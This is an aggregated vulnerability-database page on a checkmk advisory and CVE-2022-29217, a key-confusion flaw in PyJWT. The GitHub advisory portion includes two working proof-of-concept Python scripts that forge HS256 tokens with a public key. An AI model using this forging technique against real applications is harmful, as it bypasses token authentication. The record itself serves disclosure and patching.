"BSI-WID", version: "1.3.5", }, }, id: "WID-SEC-W-2022-0456", initial_release_date: "2022-06-23T22:00:00.000+00:00", revision_history: [ { date: "2022-06-23T22:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2022-07-05T22:00:00.000+00:00", number: "2", summary: "CHECKMK Referenz aufgenommen", }, { date: "2022-07-19T22:00:00.000+00:00", number: "3", summary: "Neue Updates von Ubuntu aufgenommen", }, { date: "2022-08-16T22:00:00.000+00:00", number: "4", summary: "Neue Updates von Ubuntu aufgenommen", }, { date: "2022-11-10T23:00:00.000+00:00", number: "5", summary: "Neue Updates von SUSE aufgenommen", }, { date: "2022-12-07T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, ], status: "final", version: "6", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, ], category: "vendor", name: "Red Hat", }, { branches: [ { category: "product_name", name: "SUSE Linux", product: { name: "SUSE Linux", product_id: "T002207", product_identification_helper: { cpe: "cpe:/o:suse:suse_linux:-", }, }, }, ], category: "vendor", name: "SUSE", }, { branches: [ { category: "product_name", name: "Ubuntu Linux", product: { name: "Ubuntu Linux", product_id: "T000126", product_identification_helper: { cpe: "cpe:/o:canonical:ubuntu_linux:-", }, }, }, ], category: "vendor", name: "Ubuntu", }, { branches: [ { branches: [ { category: "product_name", name: "tribe29 checkmk < 2.0.0p27", product: { name: "tribe29 checkmk < 2.0.0p27", product_id: "T023613", product_identification_helper: { cpe: "cpe:/a:tribe29:checkmk:2.0.0p27", }, }, }, { category: "product_name", name: "tribe29 checkmk < 2.2.0i1", product: { name: "tribe29 checkmk < 2.2.0i1", product_id: "T023614", product_identification_helper: { cpe: "cpe:/a:tribe29:checkmk:2.2.0i1", }, }, }, { category: "product_name", name: "tribe29 checkmk < 2.1.0p4", product: { name: "tribe29 checkmk < 2.1.0p4", product_id: "T023615", product_identification_helper: { cpe: "cpe:/a:tribe29:checkmk:2.1.0p4", }, }, }, ], category: "product_name", name: "checkmk", }, ], category: "vendor", name: "tribe29", }, ], }, vulnerabilities: [ { cve: "CVE-2020-25658", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2020-25658", }, { cve: "CVE-2021-34141", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2021-34141", }, { cve: "CVE-2021-41495", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2021-41495", }, { cve: "CVE-2021-41496", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2021-41496", }, { cve: "CVE-2022-29217", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2022-29217", }, { cve: "CVE-2022-29361", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2022-29361", }, { cve: "CVE-2022-30595", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2022-30595", }, ], }
fkie_cve-2022-29217
Vulnerability from fkie_nvd
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Vendor | Product | Version | |
---|---|---|---|
pyjwt_project | pyjwt | * | |
fedoraproject | fedora | 35 | |
fedoraproject | fedora | 36 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*", matchCriteriaId: "8F4B0C65-A921-4799-A7E3-C67A61940377", versionEndExcluding: "2.4.0", versionStartIncluding: "1.5.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", matchCriteriaId: "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", matchCriteriaId: "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", }, { lang: "es", value: "PyJWT es una implementación en Python del RFC 7519. PyJWT soporta múltiples algoritmos de firma JWT diferentes. Con JWT, un atacante que envía el token JWT puede elegir el algoritmo de firma usado. La biblioteca PyJWT requiere que la aplicación elija qué algoritmos son soportados. La aplicación puede especificar \"jwt.algorithms.get_default_algorithms()\" para conseguir soporte para todos los algoritmos, o especificar un único algoritmo. El problema no es tan grande ya que debe ser usado \"algorithms=jwt.algorithms.get_default_algorithms()\". Los usuarios deben actualizar a la versión 2.4.0 para recibir un parche para este problema. Como mitigación, sea siempre explícito con los algoritmos que son aceptados y son esperados cuando es decodificado", }, ], id: "CVE-2022-29217", lastModified: "2024-11-21T06:58:44.463", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, exploitabilityScore: 2.2, impactScore: 5.2, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-05-24T15:15:07.767", references: [ { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { source: "security-advisories@github.com", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { source: "security-advisories@github.com", tags: [ "Issue Tracking", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.vicarius.io/vsociety/posts/risky-algorithms-algorithm-confusion-in-pyjwt-cve-2022-29217", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-327", }, ], source: "security-advisories@github.com", type: "Primary", }, ], }
gsd-2022-29217
Vulnerability from gsd
{ GSD: { alias: "CVE-2022-29217", description: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", id: "GSD-2022-29217", references: [ "https://www.suse.com/security/cve/CVE-2022-29217.html", "https://advisories.mageia.org/CVE-2022-29217.html", "https://security.archlinux.org/CVE-2022-29217", "https://ubuntu.com/security/CVE-2022-29217", ], }, gsd: { metadata: { exploitCode: "unknown", remediation: "unknown", reportConfidence: "confirmed", type: "vulnerability", }, osvSchema: { aliases: [ "CVE-2022-29217", ], details: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", id: "GSD-2022-29217", modified: "2023-12-13T01:19:41.552376Z", schema_version: "1.4.0", }, }, namespaces: { "cve.org": { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2022-29217", STATE: "PUBLIC", TITLE: "Key confusion through non-blocklisted public key formats in PyJWT", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "pyjwt", version: { version_data: [ { version_value: ">= 1.5.0, < 2.4.0", }, ], }, }, ], }, vendor_name: "jpadilla", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", }, ], }, impact: { cvss: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-327: Use of a Broken or Risky Cryptographic Algorithm", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", refsource: "CONFIRM", url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { name: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", refsource: "MISC", url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { name: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", refsource: "MISC", url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { name: "FEDORA-2022-3cf456dc20", refsource: "FEDORA", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { name: "FEDORA-2022-4ae9110f51", refsource: "FEDORA", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, ], }, source: { advisory: "GHSA-ffqj-6fqr-9h24", discovery: "UNKNOWN", }, }, "gitlab.com": { advisories: [ { affected_range: ">=1.5.0,<2.4.0", affected_versions: "All versions starting from 1.5.0 before 2.4.0", cvss_v2: "AV:N/AC:L/Au:N/C:N/I:P/A:N", cvss_v3: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", cwe_ids: [ "CWE-1035", "CWE-327", "CWE-937", ], date: "2022-06-07", description: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", fixed_versions: [ "2.4.0", ], identifier: "CVE-2022-29217", identifiers: [ "CVE-2022-29217", "GHSA-ffqj-6fqr-9h24", ], not_impacted: "All versions before 1.5.0, all versions starting from 2.4.0", package_slug: "pypi/PyJWT", pubdate: "2022-05-24", solution: "Upgrade to version 2.4.0 or above.", title: "Use of a Broken or Risky Cryptographic Algorithm", urls: [ "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", "https://nvd.nist.gov/vuln/detail/CVE-2022-29217", "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", "https://github.com/advisories/GHSA-ffqj-6fqr-9h24", ], uuid: "59197583-2811-4971-b9ab-02960b30ab60", }, ], }, "nvd.nist.gov": { configurations: { CVE_data_version: "4.0", nodes: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "2.4.0", versionStartIncluding: "1.5.0", vulnerable: true, }, ], operator: "OR", }, { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, ], operator: "OR", }, ], }, cve: { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2022-29217", }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "en", value: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "en", value: "CWE-327", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", refsource: "CONFIRM", tags: [ "Issue Tracking", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { name: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", refsource: "MISC", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { name: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", refsource: "MISC", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { name: "FEDORA-2022-3cf456dc20", refsource: "FEDORA", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { name: "FEDORA-2022-4ae9110f51", refsource: "FEDORA", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, ], }, }, impact: { baseMetricV2: { acInsufInfo: false, cvssV2: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, severity: "MEDIUM", userInteractionRequired: false, }, baseMetricV3: { cvssV3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, }, }, lastModifiedDate: "2022-06-07T14:40Z", publishedDate: "2022-05-24T15:15Z", }, }, }
ghsa-ffqj-6fqr-9h24
Vulnerability from github
Impact
What kind of vulnerability is it? Who is impacted?
Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).
PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm.
The PyJWT library requires that the application chooses what algorithms are supported. The application can specify "jwt.algorithms.get_default_algorithms()" to get support for all algorithms. They can also specify a single one of them (which is the usual use case if calling jwt.decode directly. However, if calling jwt.decode in a helper function, all algorithms might be enabled.)
For example, if the user chooses "none" algorithm and the JWT checker supports that, there will be no signature checking. This is a common security issue with some JWT implementations.
PyJWT combats this by requiring that the if the "none" algorithm is used, the key has to be empty. As the key is given by the application running the checker, attacker cannot force "none" cipher to be used.
Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is not a public key meant for asymmetric algorithm i.e. HMAC cannot be used if the key begins with "ssh-rsa". If HMAC is used with a public key, the attacker can just use the publicly known public key to sign the token and the checker would use the same key to verify.
From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. With ed25519, PyJWT supports public keys that start with "ssh-", for example "ssh-ed25519".
```python import jwt from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import ed25519
Generate ed25519 private key
private_key = ed25519.Ed25519PrivateKey.generate()
Get private key bytes as they would be stored in a file
priv_key_bytes = private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption())
Get public key bytes as they would be stored in a file
pub_key_bytes = private_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)
Making a good jwt token that should work by signing it with the
private key encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="EdDSA")
Using HMAC with the public key to trick the receiver to think that the
public key is a HMAC secret encoded_bad = jwt.encode({"test": 1234}, pub_key_bytes, algorithm="HS256")
Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, pub_key_bytes, algorithms=jwt.algorithms.get_default_algorithms()) decoded_bad = jwt.decode(encoded_bad, pub_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
if decoded_good == decoded_bad: print("POC Successfull")
Of course the receiver should specify ed25519 algorithm to be used if
they specify ed25519 public key. However, if other algorithms are used, the POC does not work
HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
invalid_strings = [
b"-----BEGIN PUBLIC KEY-----",
b"-----BEGIN CERTIFICATE-----",
b"-----BEGIN RSA PUBLIC KEY-----",
b"ssh-rsa",
]
However, OKPAlgorithm (ed25519) accepts the following in
jwt/algorithms.py:
if "-----BEGIN PUBLIC" in str_key:
return load_pem_public_key(key)
if "-----BEGIN PRIVATE" in str_key:
return load_pem_private_key(key, password=None)
if str_key[0:4] == "ssh-":
return load_ssh_public_key(key)
These should most likely made to match each other to prevent this behavior
```
```python import jwt
openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub
priv_key_bytes = b"""-----BEGIN EC PRIVATE KEY----- MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49 AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw== -----END EC PRIVATE KEY-----"""
pub_key_bytes = b"""-----BEGIN PUBLIC KEY----- MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw== -----END PUBLIC KEY-----"""
ssh_key_bytes = b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""
Making a good jwt token that should work by signing it with the private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="ES256")
Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, ssh_key_bytes, algorithm="HS256")
Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms()) decoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
if decoded_good == decoded_bad: print("POC Successfull") else: print("POC Failed") ```
The issue is not that big as algorithms=jwt.algorithms.get_default_algorithms() has to be used. However, with quick googling, this seems to be used in some cases at least in some minor projects.
Patches
Users should upgrade to v2.4.0.
Workarounds
Always be explicit with the algorithms that are accepted and expected when decoding.
References
Are there any links users can visit to find out more?
For more information
If you have any questions or comments about this advisory: * Open an issue in https://github.com/jpadilla/pyjwt * Email José Padilla: pyjwt at jpadilla dot com
{ affected: [ { package: { ecosystem: "PyPI", name: "pyjwt", }, ranges: [ { events: [ { introduced: "1.5.0", }, { fixed: "2.4.0", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2022-29217", ], database_specific: { cwe_ids: [ "CWE-327", ], github_reviewed: true, github_reviewed_at: "2022-05-24T22:17:27Z", nvd_published_at: "2022-05-24T15:15:00Z", severity: "HIGH", }, details: "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nDisclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).\n\n> PyJWT supports multiple different JWT signing algorithms. With JWT, an \n> attacker submitting the JWT token can choose the used signing algorithm.\n> \n> The PyJWT library requires that the application chooses what algorithms \n> are supported. The application can specify \n> \"jwt.algorithms.get_default_algorithms()\" to get support for all \n> algorithms. They can also specify a single one of them (which is the \n> usual use case if calling jwt.decode directly. However, if calling \n> jwt.decode in a helper function, all algorithms might be enabled.)\n> \n> For example, if the user chooses \"none\" algorithm and the JWT checker \n> supports that, there will be no signature checking. This is a common \n> security issue with some JWT implementations.\n> \n> PyJWT combats this by requiring that the if the \"none\" algorithm is \n> used, the key has to be empty. As the key is given by the application \n> running the checker, attacker cannot force \"none\" cipher to be used.\n> \n> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is \n> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used \n> if the key begins with \"ssh-rsa\". If HMAC is used with a public key, the \n> attacker can just use the publicly known public key to sign the token \n> and the checker would use the same key to verify.\n> \n> From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. \n> With ed25519, PyJWT supports public keys that start with \"ssh-\", for \n> example \"ssh-ed25519\".\n\n```python\nimport jwt\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ed25519\n\n# Generate ed25519 private key\nprivate_key = ed25519.Ed25519PrivateKey.generate()\n\n# Get private key bytes as they would be stored in a file\npriv_key_bytes = \nprivate_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, \nencryption_algorithm=serialization.NoEncryption())\n\n# Get public key bytes as they would be stored in a file\npub_key_bytes = \nprivate_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)\n\n# Making a good jwt token that should work by signing it with the \nprivate key\nencoded_good = jwt.encode({\"test\": 1234}, priv_key_bytes, algorithm=\"EdDSA\")\n\n# Using HMAC with the public key to trick the receiver to think that the \npublic key is a HMAC secret\nencoded_bad = jwt.encode({\"test\": 1234}, pub_key_bytes, algorithm=\"HS256\")\n\n# Both of the jwt tokens are validated as valid\ndecoded_good = jwt.decode(encoded_good, pub_key_bytes, \nalgorithms=jwt.algorithms.get_default_algorithms())\ndecoded_bad = jwt.decode(encoded_bad, pub_key_bytes, \nalgorithms=jwt.algorithms.get_default_algorithms())\n\nif decoded_good == decoded_bad:\n print(\"POC Successfull\")\n\n# Of course the receiver should specify ed25519 algorithm to be used if \nthey specify ed25519 public key. However, if other algorithms are used, \nthe POC does not work\n# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py\n#\n# invalid_strings = [\n# b\"-----BEGIN PUBLIC KEY-----\",\n# b\"-----BEGIN CERTIFICATE-----\",\n# b\"-----BEGIN RSA PUBLIC KEY-----\",\n# b\"ssh-rsa\",\n# ]\n#\n# However, OKPAlgorithm (ed25519) accepts the following in \njwt/algorithms.py:\n#\n# if \"-----BEGIN PUBLIC\" in str_key:\n# return load_pem_public_key(key)\n# if \"-----BEGIN PRIVATE\" in str_key:\n# return load_pem_private_key(key, password=None)\n# if str_key[0:4] == 